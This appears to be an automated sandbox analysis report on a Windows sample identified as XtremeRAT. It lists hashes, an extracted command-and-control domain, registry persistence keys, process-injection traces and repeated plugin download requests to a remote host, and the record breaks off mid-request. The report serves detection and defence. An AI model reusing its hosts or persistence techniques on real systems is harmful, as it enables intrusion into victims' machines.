Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
08-12-2024 10:29
Static task
static1
Behavioral task
behavioral1
Sample
d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe
-
Size
699KB
-
MD5
d69477dcdd44d6f9d0102329894a9d9c
-
SHA1
123ee34e12767a0a5fbbf132a32321cdf3dbbae0
-
SHA256
ef9ec4742f12bf579efb7d36c3d645fba6d67b91272ee5b34952c25184f0afd6
-
SHA512
5b92c34293bdbad140450ed4732710ab9b5a4d25f45034f8a754cfb0bd55d7b24059c46cc8465786283a5124b88cc154d0840205023119271334dc0058a0781f
-
SSDEEP
12288:q/ezny90hw8BFyqXTS1jMeo5DKI4EZNYbaDY9wL:lnyww8BFyqjSMb4aNnMW
Malware Config
Extracted
xtremerat
dejoui2.no-ip.info
Signatures
-
Detect XtremeRAT payload 5 IoCs
resource yara_rule behavioral1/memory/2732-29-0x0000000000C80000-0x0000000000CAD000-memory.dmp family_xtremerat behavioral1/memory/2732-28-0x0000000000C80000-0x0000000000CAD000-memory.dmp family_xtremerat behavioral1/memory/1908-44-0x0000000000C80000-0x0000000000CAD000-memory.dmp family_xtremerat behavioral1/memory/2732-48-0x0000000000C80000-0x0000000000CAD000-memory.dmp family_xtremerat behavioral1/memory/2732-49-0x0000000000C80000-0x0000000000CAD000-memory.dmp family_xtremerat -
XtremeRAT
The XtremeRAT was developed by xtremecoder and has been available since at least 2010, and written in Delphi.
-
Xtremerat family
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 4 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2} jk27ca.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath = "C:\\Windows\\InstallDir\\explor.exe restart" jk27ca.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2} svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath = "C:\\Windows\\InstallDir\\explor.exe restart" svchost.exe -
Executes dropped EXE 3 IoCs
pid Process 2368 jk27ca.exe 2732 jk27ca.exe 2844 BOOSTH~1.EXE -
Loads dropped DLL 7 IoCs
pid Process 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 2368 jk27ca.exe 2368 jk27ca.exe 2368 jk27ca.exe 2732 jk27ca.exe 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 2844 BOOSTH~1.EXE -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\HKCU = "C:\\Windows\\InstallDir\\explor.exe" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\HKLM = "C:\\Windows\\InstallDir\\explor.exe" jk27ca.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\HKCU = "C:\\Windows\\InstallDir\\explor.exe" jk27ca.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\HKLM = "C:\\Windows\\InstallDir\\explor.exe" svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2368 set thread context of 2732 2368 jk27ca.exe 32 -
resource yara_rule behavioral1/memory/2732-16-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-17-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-29-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-28-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-27-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-24-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-21-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/1908-44-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-48-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx behavioral1/memory/2732-49-0x0000000000C80000-0x0000000000CAD000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\InstallDir\explor.exe jk27ca.exe File created C:\Windows\InstallDir\explor.exe jk27ca.exe File opened for modification C:\Windows\InstallDir\ jk27ca.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BOOSTH~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jk27ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jk27ca.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2368 jk27ca.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2732 jk27ca.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2020 wrote to memory of 2368 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 30 PID 2020 wrote to memory of 2368 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 30 PID 2020 wrote to memory of 2368 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 30 PID 2020 wrote to memory of 2368 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 30 PID 2020 wrote to memory of 2368 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 30 PID 2020 wrote to memory of 2368 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 30 PID 2020 wrote to memory of 2368 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 30 PID 2368 wrote to memory of 2668 2368 jk27ca.exe 31 PID 2368 wrote to memory of 2668 2368 jk27ca.exe 31 PID 2368 wrote to memory of 2668 2368 jk27ca.exe 31 PID 2368 wrote to memory of 2668 2368 jk27ca.exe 31 PID 2368 wrote to memory of 2668 2368 jk27ca.exe 31 PID 2368 wrote to memory of 2668 2368 jk27ca.exe 31 PID 2368 wrote to memory of 2668 2368 jk27ca.exe 31 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2368 wrote to memory of 2732 2368 jk27ca.exe 32 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2020 wrote to memory of 2844 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 34 PID 2020 wrote to memory of 2844 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 34 PID 2020 wrote to memory of 2844 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 34 PID 2020 wrote to memory of 2844 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 34 PID 2020 wrote to memory of 2844 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 34 PID 2020 wrote to memory of 2844 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 34 PID 2020 wrote to memory of 2844 2020 d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe 34 PID 2732 wrote to memory of 1908 2732 jk27ca.exe 33 PID 2732 wrote to memory of 2632 2732 jk27ca.exe 35 PID 2732 wrote to memory of 2632 2732 jk27ca.exe 35 PID 2732 wrote to memory of 2632 2732 jk27ca.exe 35 PID 2732 wrote to memory of 2632 2732 jk27ca.exe 35 PID 2732 wrote to memory of 2632 2732 jk27ca.exe 35 PID 2732 wrote to memory of 2632 2732 jk27ca.exe 35 PID 2732 wrote to memory of 2632 2732 jk27ca.exe 35 PID 2732 wrote to memory of 2512 2732 jk27ca.exe 36 PID 2732 wrote to memory of 2512 2732 jk27ca.exe 36 PID 2732 wrote to memory of 2512 2732 jk27ca.exe 36 PID 2732 wrote to memory of 2512 2732 jk27ca.exe 36 PID 2732 wrote to memory of 2512 2732 jk27ca.exe 36 PID 2732 wrote to memory of 2512 2732 jk27ca.exe 36 PID 2732 wrote to memory of 2512 2732 jk27ca.exe 36 PID 2732 wrote to memory of 2560 2732 jk27ca.exe 37 PID 2732 wrote to memory of 2560 2732 jk27ca.exe 37 PID 2732 wrote to memory of 2560 2732 jk27ca.exe 37 PID 2732 wrote to memory of 2560 2732 jk27ca.exe 37 PID 2732 wrote to memory of 2560 2732 jk27ca.exe 37 PID 2732 wrote to memory of 2560 2732 jk27ca.exe 37 PID 2732 wrote to memory of 2560 2732 jk27ca.exe 37 PID 2732 wrote to memory of 2568 2732 jk27ca.exe 38 PID 2732 wrote to memory of 2568 2732 jk27ca.exe 38 PID 2732 wrote to memory of 2568 2732 jk27ca.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d69477dcdd44d6f9d0102329894a9d9c_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exejk27ca.exe3⤵PID:2668
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\jk27ca.exejk27ca.exe3⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\svchost.exesvchost.exe4⤵
- Boot or Logon Autostart Execution: Active Setup
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1908
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2632
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2512
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2560
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2568
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2592
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2640
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:3052
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2088
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2576
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2372
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:1676
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:3060
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:760
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:2768
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:1264
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵PID:1472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BOOSTH~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BOOSTH~1.EXE2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2844
-
Network
-
Remote address:8.8.8.8:53Requestthetradingeye.comIN AResponsethetradingeye.comIN A193.26.158.183
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:29:43 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:29:48 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:29:54 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:29:59 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:04 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:09 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:14 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:19 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:24 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:29 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:35 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:40 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:45 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:50 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:30:55 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:00 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:05 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:10 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:16 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:21 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:26 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:31 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:37 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:42 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:47 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:52 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
